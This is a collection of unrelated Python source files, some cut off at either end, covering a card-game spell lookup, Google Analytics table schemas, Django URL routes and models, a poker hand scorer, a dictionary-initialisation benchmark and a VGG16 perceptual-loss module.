rho : float
The density of points defining the boundary polygon.
"""
coors = nm.asarray(coors)
self.__dict__.update(self.create_spb(spl_bnd, coors, rho))
self.cdim = coors.shape[1]
self.coors = coors.copy()
self.field = self.coors
self.cp_values = self.cp_coors
self.ts = self.find_ts(coors[self.idxs_inside, :])
for idim in range(self.cdim):
ucoors, ucoors_idx = nm.unique(self.ts[:, idim],
return_inverse=True)
self.base[idim] = self.bspl[idim].eval_basis(t=ucoors,
return_val=True)
self.uidx[idim] = ucoors_idx
| 2.203125 | 2 |
server/spells/__init__.py | zorlu/cards2-server | 0 | 12770017 | <reponame>zorlu/cards2-server
from .hpdp import HpDpSpell
from .damage import DamageSpell
from .hp import HpSpell
from .dp import DpSpell
from .draw import DrawSpell
from .execute import ExecuteSpell
from .swap import SwapSpell
from .restore import RestoreSpell
from .aura import AuraSpell
from .buff_add import AddBuffSpell
from .buff_remove import RemoveBuffSpell
from .switch_side import SwitchSideSpell
from .return_hand import ReturnHandSpell
from .shuffle import ShuffleSpell
from .summon import SummonSpell
from .transform import TransformSpell
def get_spell_class(spell_key):
if spell_key == "hp":
return HpSpell
elif spell_key == "dp":
return DpSpell
elif spell_key == "hpdp":
return HpDpSpell
elif spell_key == "damage":
return DamageSpell
elif spell_key == "draw":
return DrawSpell
elif spell_key == "execute":
return ExecuteSpell
elif spell_key == "swaphpdp":
return SwapSpell
elif spell_key == "restore":
return RestoreSpell
elif spell_key == "aura":
return AuraSpell
elif spell_key == "addbuff":
return AddBuffSpell
elif spell_key == "removebuff":
return RemoveBuffSpell
elif spell_key == "control":
return SwitchSideSpell
elif spell_key == "returnhand":
return ReturnHandSpell
elif spell_key == "shuffle":
return ShuffleSpell
elif spell_key == "summon":
return SummonSpell
elif spell_key == "transform":
return TransformSpell
return None
| 1.921875 | 2 |
__init__.py | brennanmcfarland/arctic-flaming-monkey-typhoon | 0 | 12770018 | <gh_stars>0
import os
import sys
sys.path.append(os.path.abspath('./arc23'))
| 1.328125 | 1 |
starthinker/task/ga_settings_download/ga_schemas.py | viohman/starthinker | 0 | 12770019 | ###########################################################################
#
# Copyright 2019 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
###########################################################################
CUSTOM_DIMENSION_SCHEMA = [{
'name': 'accountName',
'type': 'STRING'
}, {
'name': 'accountId',
'type': 'STRING'
}, {
'name': 'propertyName',
'type': 'STRING'
}, {
'name': 'propertyId',
'type': 'STRING'
}, {
'name': 'id',
'type': 'STRING'
}, {
'name': 'name',
'type': 'STRING'
}, {
'name': 'index',
'type': 'STRING'
}, {
'name': 'scope',
'type': 'STRING'
}, {
'name': 'active',
'type': 'STRING'
}, {
'name': 'created',
'type': 'TIMESTAMP'
}, {
'name': 'updated',
'type': 'TIMESTAMP'
}, {
'name': 'date',
'type': 'DATE'
}, {
'name': 'selfLink',
'type': 'STRING'
}]
CUSTOM_METRIC_SCHEMA = [{
'name': 'accountName',
'type': 'STRING'
}, {
'name': 'accountId',
'type': 'STRING'
}, {
'name': 'propertyName',
'type': 'STRING'
}, {
'name': 'propertyId',
'type': 'STRING'
}, {
'name': 'id',
'type': 'STRING'
}, {
'name': 'name',
'type': 'STRING'
}, {
'name': 'index',
'type': 'STRING'
}, {
'name': 'scope',
'type': 'STRING'
}, {
'name': 'active',
'type': 'STRING'
}, {
'name': 'created',
'type': 'TIMESTAMP'
}, {
'name': 'updated',
'type': 'TIMESTAMP'
}, {
'name': 'date',
'type': 'DATE'
}, {
'name': 'selfLink',
'type': 'STRING'
}, {
'name': 'type',
'type': 'STRING'
}, {
'name': 'min_value',
'type': 'INTEGER'
}, {
'name': 'max_value',
'type': 'INTEGER'
}]
VIEW_SCHEMA = [{
'name': 'date',
'type': 'DATE'
}, {
'name': 'id',
'type': 'STRING'
}, {
'name': 'selfLink',
'type': 'STRING'
}, {
'name': 'accountId',
'type': 'STRING'
}, {
'name': 'webPropertyId',
'type': 'STRING'
}, {
'name': 'accountName',
'type': 'STRING'
}, {
'name': 'webPropertyName',
'type': 'STRING'
}, {
'name': 'name',
'type': 'STRING'
}, {
'name': 'currency',
'type': 'STRING'
}, {
'name': 'timezone',
'type': 'STRING'
}, {
'name': 'websiteUrl',
'type': 'STRING'
}, {
'name': 'defaultPage',
'type': 'STRING'
}, {
'name': 'excludeQueryParameters',
'type': 'STRING'
}, {
'name': 'siteSearchQueryParameters',
'type': 'STRING'
}, {
'name': 'stripSiteSearchQueryParameters',
'type': 'BOOLEAN'
}, {
'name': 'siteSearchCategoryParameters',
'type': 'STRING'
}, {
'name': 'stripSiteSearchCategoryParameters',
'type': 'BOOLEAN'
}, {
'name': 'type',
'type': 'STRING'
}, {
'name': 'created',
'type': 'TIMESTAMP'
}, {
'name': 'updated',
'type': 'TIMESTAMP'
}, {
'name': 'eCommerceTracking',
'type': 'BOOLEAN'
}, {
'name': 'enhancedECommerceTracking',
'type': 'BOOLEAN'
}, {
'name': 'botFilteringEnabled',
'type': 'BOOLEAN'
}, {
'name': 'starred',
'type': 'BOOLEAN'
}]
GOAL_SCHEMA = [{
'name': 'date',
'type': 'DATE'
}, {
'name': 'id',
'type': 'STRING'
}, {
'name': 'accountId',
'type': 'STRING'
}, {
'name': 'webPropertyId',
'type': 'STRING'
}, {
'name': 'internalWebPropertyId',
'type': 'STRING'
}, {
'name': 'profileId',
'type': 'STRING'
}, {
'name': 'name',
'type': 'STRING'
}, {
'name': 'accountName',
'type': 'STRING'
}, {
'name': 'webPropertyName',
'type': 'STRING'
}, {
'name': 'profileName',
'type': 'STRING'
}, {
'name': 'value',
'type': 'FLOAT'
}, {
'name': 'active',
'type': 'BOOLEAN'
}, {
'name': 'type',
'type': 'STRING'
}, {
'name': 'created',
'type': 'TIMESTAMP'
}, {
'name': 'updated',
'type': 'TIMESTAMP'
}, {
'name':
'urlDestinationDetails',
'type':
'RECORD',
'fields': [{
'name': 'url',
'type': 'STRING'
}, {
'name': 'caseSensitive',
'type': 'BOOLEAN'
}, {
'name': 'matchType',
'type': 'STRING'
}, {
'name': 'firstStepRequired',
'type': 'BOOLEAN'
}, {
'name':
'steps',
'type':
'RECORD',
'mode':
'REPEATED',
'fields': [{
'name': 'number',
'type': 'INTEGER'
}, {
'name': 'name',
'type': 'STRING'
}, {
'name': 'url',
'type': 'STRING'
}]
}]
}, {
'name':
'visitTimeOnSiteDetails',
'type':
'RECORD',
'fields': [{
'name': 'comparisonType',
'type': 'STRING'
}, {
'name': 'comparisonValue',
'type': 'STRING'
}]
}, {
'name':
'visitNumPagesDetails',
'type':
'RECORD',
'fields': [{
'name': 'comparisonType',
'type': 'STRING'
}, {
'name': 'comparisonValue',
'type': 'STRING'
}]
}, {
'name':
'eventDetails',
'type':
'RECORD',
'fields': [{
'name': 'useEventValue',
'type': 'BOOLEAN'
}, {
'name':
'eventConditions',
'mode':
'REPEATED',
'type':
'RECORD',
'fields': [{
'name': 'type',
'type': 'STRING'
}, {
'name': 'matchType',
'type': 'STRING'
}, {
'name': 'expression',
'type': 'STRING'
}, {
'name': 'comparisonType',
'type': 'STRING'
}, {
'name': 'comparisonValue',
'type': 'STRING'
}]
}]
}]
GOOGLE_ADS_LINK_SCHEMA = [{
'name': 'date',
'type': 'DATE'
}, {
'name': 'id',
'type': 'STRING'
}, {
'name': 'kind',
'type': 'STRING'
}, {
'name': 'selfLink',
'type': 'STRING'
}, {
'name':
'entity',
'type':
'RECORD',
'fields': [{
'name':
'webPropertyRef',
'type':
'RECORD',
'fields': [{
'name': 'id',
'type': 'STRING'
}, {
'name': 'kind',
'type': 'STRING'
}, {
'name': 'href',
'type': 'STRING'
}, {
'name': 'accountId',
'type': 'STRING'
}, {
'name': 'internalWebPropertyId',
'type': 'STRING'
}, {
'name': 'name',
'type': 'STRING'
}]
}]
}, {
'name':
'adWordsAccounts',
'type':
'RECORD',
'mode':
'REPEATED',
'fields': [{
'name': 'kind',
'type': 'STRING'
}, {
'name': 'customerId',
'type': 'STRING'
}, {
'name': 'autoTaggingEnabled',
'type': 'BOOLEAN'
}]
}, {
'name': 'name',
'type': 'STRING'
}, {
'name': 'profileIds',
'type': 'RECORD',
'mode': 'REPEATED',
'fields': [{
'name': 'id',
'type': 'STRING'
}]
}]
REMARKETING_AUDIENCE_SCHEMA = [{
'name': 'date',
'type': 'DATE'
}, {
'name': 'kind',
'type': 'STRING'
}, {
'name': 'id',
'type': 'STRING'
}, {
'name': 'accountId',
'type': 'STRING'
}, {
'name': 'webPropertyId',
'type': 'STRING'
}, {
'name': 'webPropertyName',
'type': 'STRING'
}, {
'name': 'accountName',
'type': 'STRING'
}, {
'name': 'internalWebPropertyId',
'type': 'STRING'
}, {
'name': 'created',
'type': 'TIMESTAMP'
}, {
'name': 'updated',
'type': 'TIMESTAMP'
}, {
'name': 'name',
'type': 'STRING'
}, {
'name': 'description',
'type': 'STRING'
}, {
'name':
'linkedAdAccounts',
'mode':
'REPEATED',
'type':
'RECORD',
'fields': [{
'name': 'kind',
'type': 'STRING'
}, {
'name': 'id',
'type': 'STRING'
}, {
'name': 'accountId',
'type': 'STRING'
}, {
'name': 'webPropertyId',
'type': 'STRING'
}, {
'name': 'internalWebPropertyId',
'type': 'STRING'
}, {
'name': 'remarketingAudienceId',
'type': 'STRING'
}, {
'name': 'linkedAccountId',
'type': 'STRING'
}, {
'name': 'type',
'type': 'STRING'
}, {
'name': 'status',
'type': 'STRING'
}, {
'name': 'eligibleForSearch',
'type': 'BOOLEAN'
}]
}, {
'name': 'linkedViews',
'type': 'RECORD',
'mode': 'REPEATED',
'fields': [{
'name': 'id',
'type': 'STRING'
}]
}, {
'name': 'audienceType',
'type': 'STRING'
}, {
'name':
'audienceDefinition',
'type':
'RECORD',
'fields': [{
'name':
'includeConditions',
'type':
'RECORD',
'fields': [{
'name': 'kind',
'type': 'STRING'
}, {
'name': 'isSmartList',
'type': 'BOOLEAN'
}, {
'name': 'segment',
'type': 'STRING'
}, {
'name': 'membershipDurationDays',
'type': 'INTEGER'
}, {
'name': 'daysToLookBack',
'type': 'INTEGER'
}]
}]
}, {
'name':
'stateBasedAudienceDefinition',
'type':
'RECORD',
'fields': [{
'name':
'includeConditions',
'type':
'RECORD',
'fields': [{
'name': 'kind',
'type': 'STRING'
}, {
'name': 'isSmartList',
'type': 'BOOLEAN'
}, {
'name': 'segment',
'type': 'STRING'
}, {
'name': 'membershipDurationDays',
'type': 'INTEGER'
}, {
'name': 'daysToLookBack',
'type': 'INTEGER'
}]
}, {
'name':
'excludeConditions',
'type':
'RECORD',
'fields': [{
'name': 'segment',
'type': 'STRING'
}, {
'name': 'exclusionDuration',
'type': 'STRING'
}]
}]
}]
ACCOUNT_SUMMARIES_SCHEMA = [{
'name': 'date',
'type': 'DATE'
}, {
'name': 'id',
'type': 'STRING'
}, {
'name': 'kind',
'type': 'STRING'
}, {
'name': 'name',
'type': 'STRING'
}, {
'name': 'starred',
'type': 'BOOLEAN'
}, {
'name':
'webProperties',
'type':
'RECORD',
'mode':
'REPEATED',
'fields': [{
'name': 'kind',
'type': 'STRING'
}, {
'name': 'id',
'type': 'STRING'
}, {
'name': 'name',
'type': 'STRING'
}, {
'name': 'internalWebPropertyId',
'type': 'STRING'
}, {
'name': 'level',
'type': 'STRING'
}, {
'name': 'websiteUrl',
'type': 'STRING'
}, {
'name': 'starred',
'type': 'BOOLEAN'
}, {
'name':
'profiles',
'type':
'RECORD',
'mode':
'REPEATED',
'fields': [
{
'name': 'kind',
'type': 'STRING'
},
{
'name': 'id',
'type': 'STRING'
},
{
'name': 'name',
'type': 'STRING'
},
{
'name': 'type',
'type': 'STRING'
},
{
'name': 'starred',
'type': 'BOOLEAN'
},
]
}]
}]
| 1.210938 | 1 |
pyramidal/urls.py | gofflab/neuron-seq-site | 0 | 12770020 | from django.conf.urls import patterns, url
from pyramidal import views
urlpatterns = patterns('',
#Index
url(r'^$',views.index,name='index'),
#Geneset Views
url(r'^geneset/(?P<gene_list>[a-zA-Z0-9_\-\.\+]+)/?$',views.geneset,name='gene_set'),
#Isoform Views
url(r'^genes?/(?P<gene_id>[\w.-]+)/isoforms?/?$',views.geneIsoforms,name='isoform_index'),
url(r'^genes?/(?P<gene_id>[\w.-]+)/isoforms?/(?P<isoform_id>[\w.]+)/?$',views.isoformDetail,name='isoform_show'),
#Isoform Data
url(r'^genes?/(?P<gene_id>[\w.-]+)/isoforms?/(?P<isoform_id>[\w.]+)/hivedata/?$',views.isoformHiveData,name='isoform_hive_data'),
url(r'^genes?/(?P<gene_id>[\w.-]+)/isoforms?/(?P<isoform_id>[\w.]+)/expression/?$',views.isoformExpression,name='isoform_expression'),
#Gene detail view
url(r'^genes?/(?P<gene_id>[\w.-]+)/?$',views.geneShow,name='gene_show'),
#Gene Data
url(r'^genes?/(?P<gene_id>[\w.-]+)/hivedata/?$',views.geneHiveData,name='gene_hive_data'),
url(r'^genes?/(?P<gene_id>[\w.-]+)/expression/?$',views.geneExpression,name='gene_expression'),
# #Gene Data
# url(r'^genes?/(?P<gene_id>[\w.-]+)/hivedata/?$',views.geneHiveData,name='gene_hive_data'),
# url(r'^genes?/(?P<gene_id>[\w.-]+)/expression/?$',views.geneExpression,name='gene_expression'),
#All Genes
url(r'^genes/?$',views.geneIndex,name='gene_index'),
#Cluster Views
url(r'^clusters/?$',views.clusterIndex,name='cluster_index'),
url(r'^clusters/(?P<cluster_id>\d+)/?$',views.clusterShow,name='cluster_show'),
#Search
url(r'^search/?$', views.search, name = 'search'),
#Dev
url(r'^dev/$',views.dev),
#Markers
url(r'^markers/?$',views.markers,name = 'markers'),
#Supplement
url(r'^supp/?$',views.supplement,name = 'supplement'),
#TFBS
url(r'^tfbs/?$',views.tfbs,name = 'tfbs'),
#help
url(r'^help/?$',views.help,name = 'help'),
#Devel
url(r'^devel/?$',views.devel,name='devel'),
#About
url(r'^about/?$',views.about,name='about'),
)
| 1.820313 | 2 |
master_india_project/master_india_app/models.py | bikash-pal/master_india_assignment | 0 | 12770021 | from django.db import models
# Create your models here.
class Categories(models.Model):
catagorie=models.CharField(max_length=100)
class SubCatagories(models.Model):
#question = models.ForeignKey(Question, on_delete=models.CASCADE)
subCatagories=models.CharField(max_length=100)
class Products(models.Model):
#question = models.ForeignKey(Question, on_delete=models.CASCADE)
products=models.CharField(max_length=100)
| 2.4375 | 2 |
poker/texas_holdem/score_hand.py | jrj92280/python-kata | 3 | 12770022 | def score_hand(player_one: list, player_two: list):
if len(player_one) != 7 or len(player_two) != 7:
raise RuntimeError('invalid hands')
# pairs
player_one_pairs = player_one[1]
player_two_pairs = player_two[1]
player_one_has_pairs = len(player_one_pairs)
player_two_has_pairs = len(player_two_pairs)
if player_one_has_pairs and not player_two_has_pairs:
return 1
elif not player_one_has_pairs and player_two_has_pairs:
return -1
elif player_one_has_pairs and player_two_has_pairs:
make_list_same_size(player_one_pairs, player_two_pairs)
player_one_pairs, player_two_pairs = get_high_values(player_one_pairs, player_two_pairs)
player_one_pairs = player_one_pairs if len(player_one_pairs) < 3 else player_one_pairs[:2]
player_two_pairs = player_two_pairs if len(player_two_pairs) < 3 else player_two_pairs[:2]
# get highest two pairs
if len(player_one_pairs) != len(player_two_pairs):
return 1 if len(player_one_pairs) > len(player_two_pairs) else -1
for player_one_pair_value, player_two_pair_value in zip(player_one_pairs, player_two_pairs):
if player_one_pair_value > player_two_pair_value:
return 1
elif player_one_pair_value < player_two_pair_value:
return -1
# high cards
player_one_high_cards = player_one[0]
player_two_high_cards = player_two[0]
for player_one_card, player_two_card in zip(player_one_high_cards, player_two_high_cards):
player_one_card_value = get_card_value(player_one_card)
player_two_card_value = get_card_value(player_two_card)
if player_one_card_value == player_two_card_value:
continue
elif player_one_card_value > player_two_card_value:
return 1
else:
return -1
return 0
def get_high_values(player_one_pairs, player_two_pairs):
player_one_values = []
player_two_values = []
for player_one_pair, player_two_pair in zip(player_one_pairs, player_two_pairs):
player_one_has_pairs = len(player_one_pair)
player_two_has_pairs = len(player_two_pair)
player_one_current_value = get_card_value(player_one_pair[0]) if player_one_has_pairs else 0
player_two_current_value = get_card_value(player_two_pair[0]) if player_two_has_pairs else 0
if player_one_current_value:
player_one_values.append(player_one_current_value)
if player_two_current_value:
player_two_values.append(player_two_current_value)
player_one_values.sort(reverse=True)
player_two_values.sort(reverse=True)
return player_one_values, player_two_values
def make_list_same_size(list_one: list, list_two: list) -> None:
length_list_one = len(list_one)
length_list_two = len(list_two)
while length_list_one != length_list_two:
if length_list_one > length_list_two:
list_two.append([])
length_list_two += 1
else:
list_one.append([])
length_list_one += 1
def get_card_value(card):
return int(card[1:])
| 3.765625 | 4 |
HackerRank/PythonHackerRankSolutions/BuiltIns/Zipped.py | accidentalgenius09/competitive-programming-solution | 8 | 12770023 | <filename>HackerRank/PythonHackerRankSolutions/BuiltIns/Zipped.py
'''
Title : Zipped!
Subdomain : Built-Ins
Domain : Python
Author : codeperfectplus
Created : 17 January 2020
'''
# Enter your code here. Read input from STDIN. Print output to STDOUT
n, x = map(int, input().split())
sheet = []
for _ in range(x):
sheet.append(map(float, input().split()) )
for i in zip(*sheet):
print( sum(i)/len(i) )
| 3 | 3 |
airflow/constants.py | vishwas78/python-workflow-test | 0 | 12770024 | PROJECT_NAME = "rtheta-central"
BUCKET_NAME = "central.rtheta.in"
ZONE = "asia-south1-a"
| 1.132813 | 1 |
sortsearch/ferriswheel.py | ashutoshdumiyan/CSES-Solutions | 0 | 12770025 | from sys import stdin
n, x = map(int, stdin.readline().split())
li = [int(c) for c in stdin.readline().split()]
li.sort()
res = 0
i = 0
j = n - 1
while i <= j:
if li[i] + li[j] > x:
j -= 1
else:
i += 1
j -= 1
res += 1
print(res)
| 2.671875 | 3 |
dict_of_dicts_init.py | denis-ryzhkov/timeit_ab | 0 | 12770026 | #!/usr/bin/env python
"""
A/B timeit test: dict of dicts init.
Output:
exists = False:
speedup seconds option
15% 0.780859 in else
11% 0.821429 defaultdict
10% 0.825422 not in
3% 0.890609 get
0% 0.918161 setdefault
-83% 1.683932 try
exists = True:
speedup seconds option
21% 0.619301 defaultdict
19% 0.634981 try
13% 0.679612 not in
13% 0.681775 in else
5% 0.743055 get
0% 0.779458 setdefault
Result:
* If you want to control when to avoid auto-init on read
(e.g. after explicit delete of k1),
then use "in else" option:
if k1 in d:
d[k1][k2] = v
else:
d[k1] = {k2: v}
* If it fits code better, "not in" option is almost as good:
if k1 not in d:
d[k1] = {}
d[k1][k2] = v
* But if you are OK with auto-init in all cases,
then "defaultdict" is the best option - both fast and DRY:
from collections import defaultdict
d = defaultdict(dict)
d[k1][k2] = v
* While it looks like minus one lookup,
"get" option has almost no effect:
vs = d.get(k1)
if vs is None:
d[k1] = {k2: v}
else:
vs[k2] = v
* Never use "try" option:
it is very slow when k1 does not exist,
and slower than defaultdict when k1 exists:
try:
d[k1][k2] = v
except KeyError:
d[k1] = {k2: v}
* "setdefault" option creates new dict each time,
so it is very bad both for memory and speed:
d.setdefault(k1, {})[k2] = v
Copyright (C) 2017 by <NAME> <<EMAIL>>
MIT License, see http://opensource.org/licenses/MIT
"""
### import
import gc
import time
### config
envs = [
'exists = False',
'exists = True',
]
k1 = 'k1'
k2 = 'k2'
v = 'v'
d1 = {'k' + str(i): {} for i in xrange(10**6)}
defaults = dict(
init_once='pass',
init_each='pass',
repeat=10**6,
)
tests = [
dict(
name='setdefault',
init_once='d = d1.copy()',
init_each='if not exists: del d[k1]',
measure='d.setdefault(k1, {})[k2] = v',
),
dict(
name='defaultdict',
init_once='''
from collections import defaultdict
d = defaultdict(dict, d1)
''',
init_each='if not exists: del d[k1]',
measure='d[k1][k2] = v',
),
dict(
name='not in',
init_once='d = d1.copy()',
init_each='if not exists: del d[k1]',
measure='''
if k1 not in d:
d[k1] = {}
d[k1][k2] = v
''',
),
dict(
name='in else',
init_once='d = d1.copy()',
init_each='if not exists: del d[k1]',
measure='''
if k1 in d:
d[k1][k2] = v
else:
d[k1] = {k2: v}
''',
),
dict(
name='get',
init_once='d = d1.copy()',
init_each='if not exists: del d[k1]',
measure='''
vs = d.get(k1)
if vs is None:
d[k1] = {k2: v}
else:
vs[k2] = v
''',
),
dict(
name='try',
init_once='d = d1.copy()',
init_each='if not exists: del d[k1]',
measure='''
try:
d[k1][k2] = v
except KeyError:
d[k1] = {k2: v}
''',
),
]
### main
def main():
gc.disable()
for env in envs:
print('\n{}:'.format(env))
exec(env)
results = []
base_seconds = None
for test in tests:
init_once = compile(test.get('init_once') or defaults['init_once'], '<string>', 'exec')
init_each = compile(test.get('init_each') or defaults['init_each'], '<string>', 'exec')
measure = compile(test['measure'], '<string>', 'exec')
repeat = test.get('repeat') or defaults['repeat']
exec(init_once)
seconds = 0
for _ in xrange(repeat):
exec(init_each)
start = time.time()
exec(measure)
seconds += time.time() - start
results.append((seconds, test['name']))
if base_seconds is None:
base_seconds = seconds
print('speedup seconds option')
for seconds, name in sorted(results):
print('{:6d}% {:.6f} {}'.format(
int(round(100 * (base_seconds - seconds) / base_seconds)),
seconds,
name,
))
if __name__ == '__main__':
main()
| 3.21875 | 3 |
Test/trainValues.py | ADMoreau/Software-Assurance-Defect-Localization | 1 | 12770027 | <reponame>ADMoreau/Software-Assurance-Defect-Localization<gh_stars>1-10
import csv
from difflib import SequenceMatcher
trainInit = []
testInit = []
############LISTS OS IMPORTEED FEATURES#############################
temp1 = open('90filteredOMITGOOD.csv','r')
data1 = csv.reader((line.replace('\0','') for line in temp1), delimiter = '\n')
OMITGOODFEATS = list(data1)
temp2 = open('90filteredOMITBAD.csv','r')
data2 = csv.reader((line.replace('\0','') for line in temp2), delimiter = '\n')
OMITBADFEATS = list(data2)
trainFeats = OMITGOODFEATS + OMITBADFEATS
#################################IMPORT TEST DOCS#######################################
OMITBAD_TRAIN1 = open('OMITBAD_TRAIN_200.txt')
OMITBAD_TRAIN1 = OMITBAD_TRAIN1.readlines()[1:]
trainInit.append(OMITBAD_TRAIN1[0])
OMITBAD_TRAIN2 = open('OMITBAD_TRAIN_3.txt')
OMITBAD_TRAIN2 = OMITBAD_TRAIN2.readlines()[1:]
trainInit.append(OMITBAD_TRAIN2[0])
OMITBAD_TRAIN3 = open('OMITBAD_TRAIN_361.txt')
OMITBAD_TRAIN3 = OMITBAD_TRAIN3.readlines()[1:]
trainInit.append(OMITBAD_TRAIN3[0])
OMITBAD_TRAIN4 = open('OMITBAD_TRAIN_25.txt')
OMITBAD_TRAIN4 = OMITBAD_TRAIN4.readlines()[1:]
trainInit.append(OMITBAD_TRAIN4[0])
OMITBAD_TRAIN5 = open('OMITBAD_TRAIN_428.txt')
OMITBAD_TRAIN5 = OMITBAD_TRAIN5.readlines()[1:]
trainInit.append(OMITBAD_TRAIN5[0])
OMITBAD_TEST1 = open('OMITBAD_TEST_16.txt')
OMITBAD_TEST1 = OMITBAD_TEST1.readlines()[1:]
testInit.append(OMITBAD_TEST1[0])
OMITBAD_TEST2 = open('OMITBAD_TEST_27.txt')
OMITBAD_TEST2 = OMITBAD_TEST2.readlines()[1:]
testInit.append(OMITBAD_TEST2[0])
OMITBAD_TEST3 = open('OMITBAD_TEST_70.txt')
OMITBAD_TEST3 = OMITBAD_TEST3.readlines()[1:]
testInit.append(OMITBAD_TEST3[0])
OMITBAD_TEST4 = open('OMITBAD_TEST_208.txt')
OMITBAD_TEST4 = OMITBAD_TEST4.readlines()[1:]
testInit.append(OMITBAD_TEST4[0])
OMITBAD_TEST5 = open('OMITBAD_TEST_173.txt')
OMITBAD_TEST5 = OMITBAD_TEST5.readlines()[1:]
testInit.append(OMITBAD_TEST5[0])
OMITGOOD_TRAIN1 = open('OMITGOOD_TRAIN_57.txt')
OMITGOOD_TRAIN1 = OMITGOOD_TRAIN1.readlines()[1:]
trainInit.append(OMITGOOD_TRAIN1[0])
OMITGOOD_TRAIN2 = open('OMITGOOD_TRAIN_193.txt')
OMITGOOD_TRAIN2 = OMITGOOD_TRAIN2.readlines()[1:]
trainInit.append(OMITGOOD_TRAIN2[0])
OMITGOOD_TRAIN3 = open('OMITGOOD_TRAIN_253.txt')
OMITGOOD_TRAIN3 = OMITGOOD_TRAIN3.readlines()[1:]
trainInit.append(OMITGOOD_TRAIN3[0])
OMITGOOD_TRAIN4 = open('OMITGOOD_TRAIN_315.txt')
OMITGOOD_TRAIN4 = OMITGOOD_TRAIN4.readlines()[1:]
trainInit.append(OMITGOOD_TRAIN4[0])
OMITGOOD_TRAIN5 = open('OMITGOOD_TRAIN_193.txt')
OMITGOOD_TRAIN5 = OMITGOOD_TRAIN5.readlines()[1:]
trainInit.append(OMITGOOD_TRAIN5[0])
OMITGOOD_TEST1 = open('OMITGOOD_TEST_15.txt')
OMITGOOD_TEST1 = OMITGOOD_TEST1.readlines()[1:]
testInit.append(OMITGOOD_TEST1[0])
OMITGOOD_TEST2 = open('OMITGOOD_TEST_87.txt')
OMITGOOD_TEST2 = OMITGOOD_TEST2.readlines()[1:]
testInit.append(OMITGOOD_TEST2[0])
OMITGOOD_TEST3 = open('OMITGOOD_TEST_263.txt')
OMITGOOD_TEST3 = OMITGOOD_TEST3.readlines()[1:]
testInit.append(OMITGOOD_TEST3[0])
OMITGOOD_TEST4 = open('OMITGOOD_TEST_491.txt')
OMITGOOD_TEST4 = OMITGOOD_TEST4.readlines()[1:]
testInit.append(OMITGOOD_TEST4[0])
OMITGOOD_TEST5 = open('OMITGOOD_TEST_421.txt')
OMITGOOD_TEST5 = OMITGOOD_TEST5.readlines()[1:]
testInit.append(OMITGOOD_TEST5[0])
'''
testfinal = []
for i in range(0,5):
x = testInit[i]
print(i)
temp = []
for j in range(len(trainFeats)):
s = .5
y = trainFeats[j][0]
z = (len(x) - len(y))
#print(z)
for k in range(0, z):
#print(x[k:len(y)+k])
stemp = SequenceMatcher(None, x[k:len(y)+k], y).ratio()
if stemp > s:
s = stemp
print(s)
if s == .5:
temp.append(0)
else:
temp.append(s)
temp.append(1)#Class value for OMITBAD aka Good
testfinal.append(temp)
#for i in testfinal:
# i.append(1) #the first five are OMITBAD so 1 = good code this last element is the class
for i in range(5,10):
x = testInit[i]
print(i)
temp = []
for j in range(len(trainFeats)):
s = .5
y = trainFeats[j][0]
z = (len(x) - len(y))
#print(z, len(y))
for k in range(0, z):
#print(x[k:len(y)+k])
stemp = SequenceMatcher(None, x[k:len(y)+k], y).ratio()
if stemp > s:
s = stemp
print(s)
if s == .5:
temp.append(0)
else:
temp.append(s)
temp.append(0)#the last five are OMITGOOD
testfinal.append(temp)
'''
trainfinal = []
for i in range(0,5):
x = trainInit[i]
print(i)
temp = []
for j in range(len(trainFeats)):
s = .5
y = trainFeats[j][0]
z = (len(x) - len(y))
#print(len(y))
#print(z, len(y))
for k in range(0, z):
#print(x[k:len(y)+k])
stemp = SequenceMatcher(None, x[k:len(y)+k], y).ratio()
if stemp > s:
s= stemp
print(s)
if s == .5:
temp.append(0)
else:
temp.append(s)
temp.append(1) #the first five are OMITBAD so 1 = good code this last element is the class
trainfinal.append(temp)
for i in range(5,10):
x = trainInit[i]
print(i)
temp = []
for j in range(len(trainFeats)):
s = .5
y = trainFeats[j][0]
z = (len(x) - len(y))
#print(z)
for k in range(0, z):
#print(x[k:len(y)+k])
stemp = SequenceMatcher(None, x[k:len(y)+k], y).ratio()
if stemp > s:
s = stemp
print(s)
if s == .5:
temp.append(0)
else:
temp.append(s)
temp.append(0)#the last five are OMITGOOD
trainfinal.append(temp)
print(trainfinal)
#print(testfinal)
| 2.4375 | 2 |
backend/bomberbot/migrations/0004_teacher_city.py | somarae8/bomberbot_finalproject | 2 | 12770028 | <reponame>somarae8/bomberbot_finalproject
# Generated by Django 3.1.2 on 2020-10-22 16:27
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('bomberbot', '0003_auto_20201018_2352'),
]
operations = [
migrations.AddField(
model_name='teacher',
name='city',
field=models.CharField(blank=True, max_length=30),
),
]
| 1.59375 | 2 |
VGGFeatureLoss.py | nikadilli/elemental-imageing-enhancement | 1 | 12770029 | import fastai
from fastai.vision import *
from fastai.callbacks import *
from fastai.utils.mem import *
from torchvision.models import vgg16_bn
from skimage.measure import compare_ssim
def gram_matrix(x):
n,c,h,w = x.size()
x = x.view(n, c, -1)
return (x @ x.transpose(1,2))/(c*h*w)
class VGG16FeatureLoss(nn.Module):
# create loss from VGG16 pretrained model and gram matrix
def __init__(self, lyrs_wgts):
super().__init__()
# create vgg16 instance
self.model = vgg16_bn(True).features.cuda().eval()
requires_grad(self.model, False)
# get layers with relu
blocks = [i-1 for i,o in enumerate(children(self.model)) if isinstance(o,nn.MaxPool2d)]
self.loss_features = [self.model[i] for i in blocks[2:5]]
self.hooks = hook_outputs(self.loss_features, detach=False)
self.wgts = lyrs_wgts
self.metric_names = ['LAD',] + [f'feat_{i}' for i in range(len(blocks[2:5]))
] + [f'gram_{i}' for i in range(len(blocks[2:5]))]
def make_features(self, x, clone=False):
self.model(x)
return [(o.clone() if clone else o) for o in self.hooks.stored]
def forward(self, input, target):
out_feat = self.make_features(target, clone=True)
in_feat = self.make_features(input)
# base l1 loss
self.feat_losses = [F.l1_loss(input,target)]
# feature loss
self.feat_losses += [F.l1_loss(f_in, f_out)*w
for f_in, f_out, w in zip(in_feat, out_feat, self.wgts)]
# gram matrix loss
self.feat_losses += [F.l1_loss(gram_matrix(f_in), gram_matrix(f_out))*w**2 * 5e3
